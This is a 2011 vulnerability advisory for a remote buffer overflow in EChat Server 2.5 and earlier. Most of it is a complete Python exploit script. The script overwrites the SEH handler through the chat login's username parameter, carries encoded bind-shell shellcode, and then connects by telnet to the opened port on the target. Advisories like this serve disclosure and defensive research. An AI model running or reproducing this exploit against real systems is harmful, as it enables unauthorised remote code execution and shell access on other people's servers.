INSECT Pro - Exploit EChat Server <= v2.5 20110812 - Remote Buffer Overflow Exploit

2011-08-17T00:00:00
ID SECURITYVULNS:DOC:26856
Type securityvulns
Reporter Securityvulns
Modified 2011-08-17T00:00:00

Description

Information

Name : EChat Server <= v2.5 Software : E Chat Server Vendor Homepage : http://www.echatserver.com/ Vulnerability Type : Remote Buffer Overflow Exploit Severity : High Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>

Description

EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Exploit example as follow

!/usr/bin/python

Easy Chat Server Server <= v2.5 Remote Buffer Overflow Exploit

Written by Juan Sacco (Runlvl)

Contact: jsacco@insecurityresearch.com

Web site: http://www.insecurityresearch.com

Target tested: Windows XP SP3

import string, sys import socket, httplib import telnetlib

def howtousage(): print "Sorry, required arguments: Host Port" sys.exit(-1)

def run(): try: # Basic structure: JUNK + NSEH + SEH + SHELLCODE Junk = '\x41' * 216 # 216 bytes of A nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret

# ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper
ShellCode = &#40;
&quot;&#92;x89&#92;xe1&#92;xd9&#92;xed&#92;xd9&#92;x71&#92;xf4&#92;x5f&#92;x57&#92;x59&#92;x49&#92;x49&#92;x49&#92;x49&#92;x43&quot;
&quot;&#92;x43&#92;x43&#92;x43&#92;x43&#92;x43&#92;x51&#92;x5a&#92;x56&#92;x54&#92;x58&#92;x33&#92;x30&#92;x56&#92;x58&#92;x34&quot;
&quot;&#92;x41&#92;x50&#92;x30&#92;x41&#92;x33&#92;x48&#92;x48&#92;x30&#92;x41&#92;x30&#92;x30&#92;x41&#92;x42&#92;x41&#92;x41&quot;
&quot;&#92;x42&#92;x54&#92;x41&#92;x41&#92;x51&#92;x32&#92;x41&#92;x42&#92;x32&#92;x42&#92;x42&#92;x30&#92;x42&#92;x42&#92;x58&quot;
&quot;&#92;x50&#92;x38&#92;x41&#92;x43&#92;x4a&#92;x4a&#92;x49&#92;x4b&#92;x4c&#92;x5a&#92;x48&#92;x4b&#92;x39&#92;x43&#92;x30&quot;
&quot;&#92;x45&#92;x50&#92;x45&#92;x50&#92;x43&#92;x50&#92;x4c&#92;x49&#92;x4b&#92;x55&#92;x50&#92;x31&#92;x4e&#92;x32&#92;x45&quot;
&quot;&#92;x34&#92;x4c&#92;x4b&#92;x50&#92;x52&#92;x50&#92;x30&#92;x4c&#92;x4b&#92;x56&#92;x32&#92;x54&#92;x4c&#92;x4c&#92;x4b&quot;
&quot;&#92;x50&#92;x52&#92;x52&#92;x34&#92;x4c&#92;x4b&#92;x54&#92;x32&#92;x47&#92;x58&#92;x54&#92;x4f&#92;x4e&#92;x57&#92;x51&quot;
&quot;&#92;x5a&#92;x56&#92;x46&#92;x50&#92;x31&#92;x4b&#92;x4f&#92;x50&#92;x31&#92;x4f&#92;x30&#92;x4e&#92;x4c&#92;x47&#92;x4c&quot;
&quot;&#92;x45&#92;x31&#92;x43&#92;x4c&#92;x43&#92;x32&#92;x56&#92;x4c&#92;x47&#92;x50&#92;x4f&#92;x31&#92;x58&#92;x4f&#92;x54&quot;
&quot;&#92;x4d&#92;x45&#92;x51&#92;x58&#92;x47&#92;x5a&#92;x42&#92;x4c&#92;x30&#92;x51&#92;x42&#92;x56&#92;x37&#92;x4c&#92;x4b&quot;
&quot;&#92;x56&#92;x32&#92;x52&#92;x30&#92;x4c&#92;x4b&#92;x50&#92;x42&#92;x47&#92;x4c&#92;x45&#92;x51&#92;x58&#92;x50&#92;x4c&quot;
&quot;&#92;x4b&#92;x47&#92;x30&#92;x54&#92;x38&#92;x4d&#92;x55&#92;x49&#92;x50&#92;x52&#92;x54&#92;x51&#92;x5a&#92;x45&#92;x51&quot;
&quot;&#92;x4e&#92;x30&#92;x56&#92;x30&#92;x4c&#92;x4b&#92;x50&#92;x48&#92;x54&#92;x58&#92;x4c&#92;x4b&#92;x56&#92;x38&#92;x51&quot;
&quot;&#92;x30&#92;x45&#92;x51&#92;x58&#92;x53&#92;x5a&#92;x43&#92;x47&#92;x4c&#92;x51&#92;x59&#92;x4c&#92;x4b&#92;x56&#92;x54&quot;
&quot;&#92;x4c&#92;x4b&#92;x45&#92;x51&#92;x49&#92;x46&#92;x50&#92;x31&#92;x4b&#92;x4f&#92;x50&#92;x31&#92;x49&#92;x50&#92;x4e&quot;
&quot;&#92;x4c&#92;x49&#92;x51&#92;x58&#92;x4f&#92;x54&#92;x4d&#92;x45&#92;x51&#92;x58&#92;x47&#92;x56&#92;x58&#92;x4d&#92;x30&quot;
&quot;&#92;x54&#92;x35&#92;x5a&#92;x54&#92;x54&#92;x43&#92;x43&#92;x4d&#92;x4b&#92;x48&#92;x47&#92;x4b&#92;x43&#92;x4d&#92;x47&quot;
&quot;&#92;x54&#92;x52&#92;x55&#92;x4d&#92;x32&#92;x50&#92;x58&#92;x4c&#92;x4b&#92;x51&#92;x48&#92;x51&#92;x34&#92;x43&#92;x31&quot;
&quot;&#92;x4e&#92;x33&#92;x43&#92;x56&#92;x4c&#92;x4b&#92;x54&#92;x4c&#92;x50&#92;x4b&#92;x4c&#92;x4b&#92;x56&#92;x38&#92;x45&quot;
&quot;&#92;x4c&#92;x45&#92;x51&#92;x58&#92;x53&#92;x4c&#92;x4b&#92;x43&#92;x34&#92;x4c&#92;x4b&#92;x45&#92;x51&#92;x4e&#92;x30&quot;
&quot;&#92;x4c&#92;x49&#92;x50&#92;x44&#92;x56&#92;x44&#92;x56&#92;x44&#92;x51&#92;x4b&#92;x51&#92;x4b&#92;x45&#92;x31&#92;x51&quot;
&quot;&#92;x49&#92;x50&#92;x5a&#92;x50&#92;x51&#92;x4b&#92;x4f&#92;x4d&#92;x30&#92;x56&#92;x38&#92;x51&#92;x4f&#92;x50&#92;x5a&quot;
&quot;&#92;x4c&#92;x4b&#92;x54&#92;x52&#92;x5a&#92;x4b&#92;x4b&#92;x36&#92;x51&#92;x4d&#92;x52&#92;x48&#92;x56&#92;x53&#92;x47&quot;
&quot;&#92;x42&#92;x43&#92;x30&#92;x45&#92;x50&#92;x43&#92;x58&#92;x43&#92;x47&#92;x43&#92;x43&#92;x47&#92;x42&#92;x51&#92;x4f&quot;
&quot;&#92;x56&#92;x34&#92;x52&#92;x48&#92;x50&#92;x4c&#92;x52&#92;x57&#92;x56&#92;x46&#92;x45&#92;x57&#92;x4b&#92;x4f&#92;x4e&quot;
&quot;&#92;x35&#92;x4e&#92;x58&#92;x5a&#92;x30&#92;x45&#92;x51&#92;x43&#92;x30&#92;x45&#92;x50&#92;x51&#92;x39&#92;x4f&#92;x34&quot;
&quot;&#92;x51&#92;x44&#92;x56&#92;x30&#92;x52&#92;x48&#92;x51&#92;x39&#92;x4d&#92;x50&#92;x52&#92;x4b&#92;x45&#92;x50&#92;x4b&quot;
&quot;&#92;x4f&#92;x4e&#92;x35&#92;x56&#92;x30&#92;x56&#92;x30&#92;x50&#92;x50&#92;x50&#92;x50&#92;x47&#92;x30&#92;x50&#92;x50&quot;
&quot;&#92;x47&#92;x30&#92;x50&#92;x50&#92;x52&#92;x48&#92;x5a&#92;x4a&#92;x54&#92;x4f&#92;x49&#92;x4f&#92;x4d&#92;x30&#92;x4b&quot;
&quot;&#92;x4f&#92;x49&#92;x45&#92;x4d&#92;x59&#92;x58&#92;x47&#92;x50&#92;x31&#92;x49&#92;x4b&#92;x56&#92;x33&#92;x52&#92;x48&quot;
&quot;&#92;x43&#92;x32&#92;x43&#92;x30&#92;x54&#92;x51&#92;x51&#92;x4c&#92;x4b&#92;x39&#92;x4d&#92;x36&#92;x43&#92;x5a&#92;x54&quot;
&quot;&#92;x50&#92;x56&#92;x36&#92;x50&#92;x57&#92;x52&#92;x48&#92;x49&#92;x52&#92;x49&#92;x4b&#92;x56&#92;x57&#92;x43&#92;x57&quot;
&quot;&#92;x4b&#92;x4f&#92;x58&#92;x55&#92;x50&#92;x53&#92;x56&#92;x37&#92;x52&#92;x48&#92;x4f&#92;x47&#92;x4b&#92;x59&#92;x50&quot;
&quot;&#92;x38&#92;x4b&#92;x4f&#92;x4b&#92;x4f&#92;x49&#92;x45&#92;x51&#92;x43&#92;x51&#92;x43&#92;x51&#92;x47&#92;x43&#92;x58&quot;
&quot;&#92;x43&#92;x44&#92;x5a&#92;x4c&#92;x47&#92;x4b&#92;x4b&#92;x51&#92;x4b&#92;x4f&#92;x49&#92;x45&#92;x51&#92;x47&#92;x4c&quot;
&quot;&#92;x49&#92;x4f&#92;x37&#92;x52&#92;x48&#92;x52&#92;x55&#92;x52&#92;x4e&#92;x50&#92;x4d&#92;x45&#92;x31&#92;x4b&#92;x4f&quot;
&quot;&#92;x4e&#92;x35&#92;x45&#92;x38&#92;x45&#92;x33&#92;x52&#92;x4d&#92;x45&#92;x34&#92;x45&#92;x50&#92;x4c&#92;x49&#92;x5a&quot;
&quot;&#92;x43&#92;x51&#92;x47&#92;x51&#92;x47&#92;x51&#92;x47&#92;x50&#92;x31&#92;x5a&#92;x56&#92;x52&#92;x4a&#92;x45&#92;x42&quot;
&quot;&#92;x51&#92;x49&#92;x56&#92;x36&#92;x4d&#92;x32&#92;x4b&#92;x4d&#92;x45&#92;x36&#92;x4f&#92;x37&#92;x51&#92;x54&#92;x51&quot;
&quot;&#92;x34&#92;x47&#92;x4c&#92;x43&#92;x31&#92;x43&#92;x31&#92;x4c&#92;x4d&#92;x47&#92;x34&#92;x56&#92;x44&#92;x54&#92;x50&quot;
&quot;&#92;x49&#92;x56&#92;x45&#92;x50&#92;x51&#92;x54&#92;x51&#92;x44&#92;x50&#92;x50&#92;x50&#92;x56&#92;x56&#92;x36&#92;x56&quot;
&quot;&#92;x36&#92;x47&#92;x36&#92;x51&#92;x46&#92;x50&#92;x4e&#92;x51&#92;x46&#92;x50&#92;x56&#92;x56&#92;x33&#92;x51&#92;x46&quot;
&quot;&#92;x43&#92;x58&#92;x52&#92;x59&#92;x58&#92;x4c&#92;x47&#92;x4f&#92;x4c&#92;x46&#92;x4b&#92;x4f&#92;x58&#92;x55&#92;x4c&quot;
&quot;&#92;x49&#92;x4b&#92;x50&#92;x50&#92;x4e&#92;x51&#92;x46&#92;x47&#92;x36&#92;x4b&#92;x4f&#92;x56&#92;x50&#92;x45&#92;x38&quot;
&quot;&#92;x54&#92;x48&#92;x4d&#92;x57&#92;x45&#92;x4d&#92;x43&#92;x50&#92;x4b&#92;x4f&#92;x49&#92;x45&#92;x4f&#92;x4b&#92;x4b&quot;
&quot;&#92;x4e&#92;x54&#92;x4e&#92;x50&#92;x32&#92;x4b&#92;x5a&#92;x52&#92;x48&#92;x4e&#92;x46&#92;x4c&#92;x55&#92;x4f&#92;x4d&quot;
&quot;&#92;x4d&#92;x4d&#92;x4b&#92;x4f&#92;x4e&#92;x35&#92;x47&#92;x4c&#92;x54&#92;x46&#92;x43&#92;x4c&#92;x45&#92;x5a&#92;x4b&quot;
&quot;&#92;x30&#92;x4b&#92;x4b&#92;x4b&#92;x50&#92;x54&#92;x35&#92;x43&#92;x35&#92;x4f&#92;x4b&#92;x47&#92;x37&#92;x45&#92;x43&quot;
&quot;&#92;x52&#92;x52&#92;x52&#92;x4f&#92;x43&#92;x5a&#92;x45&#92;x50&#92;x51&#92;x43&#92;x4b&#92;x4f&#92;x4e&#92;x35&#92;x41&quot;
&quot;&#92;x41&quot;&#41;
ShellCodePort = 4444
CraftedBuffer = Junk + nSEH + SEH + ShellCode
vulnerableURL = &#39;/chat.ghp?username=&#39; + CraftedBuffer +

'&password=null&room=1&null=2'

Connection = httplib.HTTPConnection&#40;Host, Port&#41;
Connection.request&#40;&#39;GET&#39;, vulnerableURL&#41;
Connection.close&#40;&#41;

print &quot;Connecting to &quot; + Host
TelnetConnection = telnetlib.Telnet&#40;Host, ShellCodePort&#41;
TelnetConnection.interact&#40;&#41;

except: print "Exploit connection closed"

if name == 'main': print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit" print "Author: Juan Sacco (Runlvl)"

try: Host = sys.argv[1] Port = sys.argv[2] except IndexError: howtousage() run()

Author

Juan Sacco (Runlvl) - http://www.insecurityresearch.com

--


Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned